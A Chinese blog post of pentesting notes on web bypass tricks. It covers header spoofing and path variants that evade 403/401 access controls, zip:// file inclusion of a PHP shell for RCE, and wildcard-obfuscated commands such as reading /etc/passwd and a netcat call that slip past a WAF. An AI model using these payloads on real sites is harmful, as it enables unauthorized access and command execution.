web端一些绕过小技巧

最新推荐文章于 2024-08-31 00:04:39 发布
最新推荐文章于 2024-08-31 00:04:39 发布
阅读量2.2k 收藏 2
点赞数
分类专栏: 笔记 WAF绕过 文章标签: 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Redredredfish/article/details/120700056
版权

  1. 目录搜集绕过403、401

    修改http头字段
    X-Originating-IP,X-Remote-IP,X-Clinet-IP,X-Forwarded-For 等。
    有时候公司会将可访问敏感数据的ip列入白名单。这些头字段将IP地址作为值,并允许您在提供的IP与其白名单中的IP匹配时进行访问。
    还可以尝试修改一些字段为特殊目录,如X-Original-URL,X-Override-URL,X-Rewrite-URL等可以设置为X-Original-URL: /admin

    使用编码字符
    例如 % =ca , %=sa,当无法直接访问/cadmin目录时,可以尝试改为%dmin绕过。

    使用相关的目录
    假如访问/admin返回状态码403
    可以尝试访问相关的目录,如
    /accessible
    /accessible/…;/admin
    /.;/admin
    /admin/~
    /./admin/./
    /admin?param
    /%2e/admin
    /admin#

    GET改用POST
    这个没啥好说的,问就是御剑大法

    挂代理
    有些奇葩站点国内不一定访问的到,国外反倒能访问

    扫描多级目录
    直接访问/admin可能会返回403,可以尝试扫描下一级目录

    被WAF拦截
    目录扫描被waf拦截,最直观的特点就是御剑扫描目录全部存在
    可以使用DirBuster改变User-Augent伪装成搜索引擎,并适量降低扫描速度

  2. 文件上传zip绕过
    假如站点www.xxx.com/index.php?page=可以上传.zip文件,可以利用文件包含绕过文件格式限制,将rce.php打包在file.zip中,访问www.xxx.com/index.php?page=zip://path/file.zip%23rce.php

  3. 使用通配符绕过waf访问敏感目录
    例如
    /bin/cat -> /???/??t
    /etc/passwd -> /???/p??s??
    /bin/nc 127.0.0.1 1337 -> /???/n? 2130706433 1337
    target.com/?cmd=cat /etc/passwd -> target.com/?cmd=%2f???%2f??t%20%2f???%2fp??s??

Redredredfish
关注
专栏目录
一些绕过403的姿势
weixin_45253622的博客
01-16 7311
口利用 扫描主机口,找其它开放web服务的口;访问其口。 修改HOST 把host值修改为子域名或者ip来绕过。 覆盖请求 URL 尝试使用 X-Original-URL 和 X-Rewrite-URL 标头绕过 Web 服务器限制。 Request GET /auth/login HTTP/1.1 Response HTTP/1.1 403 Forbidden Reqeust GET / HTTP/1.1 X-Original-URL: /auth/login Re
BypassSuper:绕过403或401或404
05-23
BypassSuper 一款针对403/401页面进行快速、高效尝试Bypass的扫描工具 ______ _____ | ___ \ / ___| | |_/ /_ _ _ __ __ _ ___ ___ \ `--. _ _ _ __ ___ _ __ | ___ \ | | | '_ \ / _` / __/ __| `--. \ | | | '_ \ / _ \ '__| | |_/ / |_| | |_) | (_| \__ \__ \/\__/ / |_| | |_) | __/ |
PHP识别url重写请求
刘阳龙Herman的专栏
09-10 5337
现在很多PHP程序都使用了url重写技术来优化url,但是有时候我们要在PHP程序中区分默认url的请求和url重写后的请求,这该如何处理呢?我的解决方案是在常量$_SERVER里面找答案,在不同的服务器中$_SERVER都会有一个索引用来记录重写请求访问重写之前的路径,部分主流服务器的索引如下IIS7 + Rewrite Module -> $_SERVER['HTTP_X_ORIGINAL_URL']IIS6 + ISAPI Rewite -> $_SERVER['HTTP_X_REWRITE_URL
CTFSHOW 萌新 web15 解题思路和方法(使用字符类绕过判断)
最新发布
weixin_58052886的博客
08-31 573
然后我们可以用tac config.php查看文件内容(*被过滤了)。但是我们发现php 、点 、config都被过滤,此时我们可以对这三部分进行"包装",即使用方括号(字符类)对config.php进行表示,字符类的使用方法可以参考正则表示式。其中,[g]表示此位置为括号中的字符g,[!1]表示不为1,此处用来表示 点(.)等符号,但是我们发现代码中解除了对分号的过滤。那么我们可以构造url语句。查询当前文件夹下的文件。较上一关卡,又过滤了。
访问控制/越权漏洞 -- 学习笔记
angry_program的博客
08-22 5513
访问控制概念 简单的来说就是应用程序首先会判断用户的身份(账号密码登录),随后确认后续请求是否由该用户发出(会话管理),然后判断是否允许用户执行“所请求的操作”或访问“所请求的资源(访问控制)” 1、从用户角度访问控制模型分为以下类型: 垂直访问控制:控制不同权限等级的用户访问应用程序不同的功能;如“管理员”可以修改/删除账号,而普通账号无法操作。 水平访问控制:控制用户只能访问自己的资源,而不能访问其他用户相同类型的资源;如“银行程序用户只能从自己的账号进行付款,而不能查看其他用户的账户”。 上
Web缓存投毒实战(五)
woliuqiangdong的博客
02-03 481
  内部缓存投毒   Drupal通常与Varnish等第三方缓存一起使用,但它也包含默认启用的内部缓存。此缓存知道X-Original-URL协议头并将其包含在其缓存键中,但错误的是包含协议头中查询字符串:      之前的攻击让我们用另一个路径替换,这能让我们覆盖上面的查询字符串:      离目标更进一步,但作用有限 —— 我们需要第三种方法。   Drupal开启重定向   在阅读DrupalURL-override代码时,我注意到一个极其危险的功能—— 在所有重定向响应中
Web应用安全:使用SQL注入绕过认证实验.doc
06-17
2. 大小写绕过:由于某些SQL引擎对关键字不区分大小写,攻击者可以通过改变关键词的大小写来规避过滤。 3. 特殊编码绕过:如使用十六进制(hex)编码,将特殊字符转换成不易被检测的格式。 4. 内联注释绕过:MySQL...
Web应用安全:使用SQL注入绕过方法文本.docx
06-17
本文将详细介绍几种常见的SQL注入绕过技巧,并分析其工作原理。 #### 注释符号绕过 在进行SQL注入时,利用注释符号可以使某些部分的代码不被执行,从而达到绕过的目的。SQL语言支持多种注释方式,包括`--`、`#`...
一些好用的bp插件bp小技巧.pdf
04-08
### 一些好用的BP插件与BP小技巧 在网络安全领域,特别是渗透测试过程中,高效利用工具可以极大提升工作效率。本文将详细介绍一系列实用的BP(Burp Suite)插件及小技巧,帮助安全研究人员更好地完成任务。 #### ...
上传验证绕过办法.pdf
08-02
以下是一些常见的服务验证绕过技巧: **3.1 服务验证绕过:HTTP Request包检测** - **Content-Type (Mime-type) 检测** - **案例分析**: - 服务可能会检查上传文件的`Content-Type`字段是否符合预期的...
分享一个AntSword过waf的小技巧1
08-03
本文将分享一个利用AntSword绕过基于流量检测的WAF策略的小技巧。一种常见的WAF检测方法是通过识别特定的关键字,如"eval",该关键字在PHP中常用于执行动态代码。当检测到含有这些关键字的请求时,WAF可能会触发警报...
PortSwigger Academy | Access control : 访问控制
水榭山寺花烂漫,凤凰集外雁归来。敢与云峰争秀色,妙雨莲花九重开。
01-27 1923
文章目录总结访问控制是什么?垂直访问控制水平访问控制上下文相关的访问控制损坏的访问控制示例垂直特权升级未受保护的功能Lab: Unprotected admin functionalityLab: Unprotected admin functionality with unpredictable URL基于参数的访问控制方法Lab: User role controlled by request parameterLab: User role can be modified in user profile
403页面绕过
qq_63980959的博客
02-29 2225
拿到客户给的地址后,首先进行信息收集。口信息收集,利用nmap进行全口探测,发现除了80口之外,还开放了一个web服务的8001口,我们尝试使用8001口访问(https://xxx.xxxx.com:8001),总是充满惊喜。可直接绕过IP限制进行访问。怕是这个运维要挨锤了,立马把这个问题,反馈给客户。https://iamadmixxx.xxx.xxx:8001/auth/login通过沟通,由于疏忽未下线8001口,客户貌似认为这个很简单,关闭8001口,下线业务后,让我们继续尝试后台能
手把手教你绕过403访问资源
MachineGunJoe666
07-08 6628
在浏览网站的时候,经常会遇到403的状态码,表示不允许访问。该状态表示服务器理解了本次请求但是拒绝执行该任务,该请求不该重发给服务器。指的是服务器有能力处理该请求,但是拒绝授权访问。这就意味着这里面有东西,我们只需绕过它。
Nginx URL重写(rewrite)配置及信息详解
weixin_34362875的博客
06-14 519
Nginx URL重写(rewrite)配置及信息详解 URL重写有利于网站首选域的确定,对于同一资源页面多条路径的301重定向有助于URL权重的集中 Nginx URL重写(rewrite)介绍 和apache等web服务软件一样,rewrite的组要功能是实现RUL地址的重定向。Nginx的rewrite功能需要PCRE软件的支持,即通过perl兼容正则表达式语句进行规则...
记一次403绕过技巧
mingyqf的博客
04-24 7173
记一次403绕过技巧 文章目录记一次403绕过技巧姿势一: 口利用姿势二:修改HOST姿势三:覆盖请求URL姿势四:Referer标头绕过姿势五:代理IP姿势六:扩展名绕过 背景 记一次接到客户的一个需求,后台管理地址(https://xxx.xxxx.com)仅允许工作区公网出口访问,对于IP的访问限制是否存在缺陷可以绕过,外网进行访问返回403状态码。 实战 姿势一: 口利用 拿到客户给的地址后,首先进行信息收集。口信息收集,利用nmap进行全口探测,发现除了80口之外,还开放了一个web
干货|渗透测试如何利用403
分享Python知识
04-11 2339
干货|渗透测试如何利用403
Nginx rewrite(URL)地址重定向
卡尔特斯
10-16 4150
一、 Nginx 配置文件使用(nginx.conf) 二、Nginx rewrite 介绍 主要功能是实现 URL 地址重写,需要 PCER 的支持。 应用位置:server、location、if 中都可以。 语法: rewrite 是实现 URL 重写的关键指令,根据匹配 URL 部分的内容,重定向到目标 URL 上,结尾是 flag 标记。 rewrite 匹配URL(正则表达式) 目标URL [flag]; flag 标记符号 Flag 标记符号 说明 l
渗透测试-渗透中403/401页面绕过的思路总结
lza20001103的博客
08-29 5574
渗透中403/401页面绕过的思路总结 文章目录渗透中403/401页面绕过的思路总结0x01 前言0x02 利用姿势1.口利用2.修改HOST3.覆盖请求URL4.Referer标头绕过5.代理IP6.扩展名绕过7.扫描的时候8.最后补充再一些401和403 bypass的tips 0x01 前言 做渗透时经常会碰到扫到的资产403的情况,特别是资产微乎其微的情况下,面试有时也会问到,这里做个总结! 0x02 利用姿势 1.口利用 扫描主机口,找其它开放web服务的口,访问其口,挑软柿子。 2
SQL注入绕过WAF策略与技巧解析
当网站部署了Web应用防火墙(WAF)来防止这种攻击时,攻击者会寻找各种技巧绕过WAF的防护措施,从而实施注入攻击。以下是一些常用的SQL注入绕过WAF的方法: 1. **注入类型**: - GET注入:攻击者通常利用URL参数...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Redredredfish

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值